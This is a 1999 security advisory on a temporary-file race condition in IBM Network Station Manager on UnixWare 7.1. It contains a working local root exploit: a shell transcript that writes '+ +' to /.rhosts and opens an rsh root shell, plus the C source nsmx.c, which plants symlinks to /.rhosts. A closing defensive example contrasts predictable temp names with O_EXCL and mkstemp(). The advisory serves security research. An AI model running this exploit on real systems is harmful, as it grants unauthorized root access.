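IBM Network Station Manager Local Security Vulnerability
Published: 1999-12-28
Updated: 1999-12-28
Affected systems:
NetStation on UnixWare 7.1
Description:
IBM Network Station Manager contains a security vulnerability that allows a local user to gain root privileges.
NetStation does not use the secure mktemp function when creating temporary files; it simply appends the current time (in seconds) to a known file name. This is a "race condition" vulnerability. For daemons that run as nobody or with similar privileges, this flaw would usually not cause much of a problem. NetStation, however, must be run by root so that it has permission to open and modify specific users' files. An attacker can exploit this by forcing a symbolic link from xnec.nsu.<time> to /.rhosts, ultimately gaining root privileges.
Test method:
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!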
bash-2.02$ ls /usr/netstation/nsm/users/xnec
UX:ls: ERROR: Cannot access /usr/netstation/nsm/users/xnec: No such file or directory
<Connect to http://localhost:880 and log in>
<Hardware -> Workstation>
bash-2.02$ ls /usr/netstation/nsm/users/xnec
xnec.nsu xnec.usr
bash-2.02$ cc -o nsmx nsmx.c
bash-2.02$ ./nsmx
<Click Workstation again>
bash-2.02$ ls -la /.rhosts
-rwx------ 1 xnec other 0 Dec 28 06:19 /.rhosts
bash-2.02$ echo "+ +" > /.rhosts
bash-2.02$ chown root /.rhosts
bash-2.02$ rsh -l root localhost sh -i
# id
uid=0(root) gid=3(sys)
groups=0(root),1(other),2(bin),3(sys),4(adm),5(uucp),6(mail),7(tty),8(audit)
,10(nuucp),12(daemon),23(cron),25(dtadmin),47(priv),9(lp)
#
/* nsmx.c - IBM NetStation on UnixWare 7.1 local root exploit
*
* Exploits a temporary file race condition in NetStation's HTTP interface
*
* To exploit: first, change the paths below to reflect your individual
* settings/paths. Don't worry if <username>.nsu doesn't exist, NS will
* create it for you. Next, point your browser at
* http://localhost:880 and login as a normal user. Click on "Hardware"
* Then "workstation". This will create <netstationdir>/users/xnec.
* Next, compile and run this program. You only have thirty seconds from
* the time you complete this step to then click on "Workstation". When
* this is done, you should have an /.rhosts which you own. On some
* UnixWare systems, you may need to chown root /.rhosts in order to do
* rsh -l root localhost sh -i.
*
* Brock Tellier btellier@usa.net
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <time.h>
#include <sys/time.h>

int main(void) {
    /* Change these paths */
    char dest[20] = "/.rhosts";
    char source[50] = "/usr/netstation/nsm/users/xnec/xnec.nsu";
    char sourcesym[50] = "/usr/netstation/nsm/users/xnec/xnec.nsu";
    long sec;
    int i;

    sec = time(0);
    /* One link per second of the thirty-second window described above */
    for (i = 0; i < 30; i++) {
        snprintf(sourcesym, sizeof sourcesym, "%s%ld", source, (sec + i));
        symlink(dest, sourcesym);
    }
    return 0;
}
Recommendation:
None at this time.
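The description attributes the flaw to temporary files created under a predictable name (a known name plus the time in seconds) without exclusive creation. The following C example is added here and is not part of the original advisory or of IBM's code; the scratch directory, the file names and all function names are constructed for illustration. It contrasts that pattern with O_EXCL creation and with mkstemp().

```c
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <time.h>
#include <unistd.h>

/* Known name + time in seconds, as in the description. With excl == 0 open()
 * follows a symlink already at that path; with O_EXCL it fails with EEXIST
 * if anything, a symlink included, already exists there. */
int create_named(const char *base, time_t now, int excl, char *out, size_t n) {
    snprintf(out, n, "%s%ld", base, (long)now);
    return open(out, O_WRONLY | O_CREAT | (excl ? O_EXCL : O_TRUNC), 0600);
}

/* Preferred: mkstemp() picks an unpredictable name and creates it exclusively. */
int create_mkstemp(const char *dir, char *out, size_t n) {
    snprintf(out, n, "%s/nsu.XXXXXX", dir);
    return mkstemp(out);
}

/* Constructed scenario in a private scratch directory. Returns a bitmask:
 * 1 exclusive open refused, 2 link target still absent afterwards,
 * 4 non-exclusive open created the link target, 8 mkstemp made a regular file. */
int run_demo(void) {
    char dir[] = "/tmp/nsudemoXXXXXX", base[64], target[64], path[96];
    struct stat st;
    time_t now = time(NULL);
    int fd, r = 0;
    if (!mkdtemp(dir)) return -1;
    snprintf(base, sizeof base, "%s/user.nsu.", dir);
    snprintf(target, sizeof target, "%s/target", dir);
    snprintf(path, sizeof path, "%s%ld", base, (long)now);
    if (symlink(target, path) != 0) return -1;  /* link exists before creation */
    fd = create_named(base, now, 1, path, sizeof path);
    if (fd < 0 && errno == EEXIST) r |= 1; else if (fd >= 0) close(fd);
    if (stat(target, &st) != 0) r |= 2;
    fd = create_named(base, now, 0, path, sizeof path);
    if (fd >= 0) close(fd);
    if (stat(target, &st) == 0) r |= 4;
    unlink(path); unlink(target);
    fd = create_mkstemp(dir, path, sizeof path);
    if (fd >= 0 && lstat(path, &st) == 0 && S_ISREG(st.st_mode)) r |= 8;
    if (fd >= 0) { close(fd); unlink(path); }
    rmdir(dir);
    return r;
}
int main(void) { printf("outcome mask: %d\n", run_demo()); return 0; }
```

A result of 15 means all four outcomes held: the exclusive open was refused, the non-exclusive open wrote through the link, and mkstemp() produced a fresh regular file.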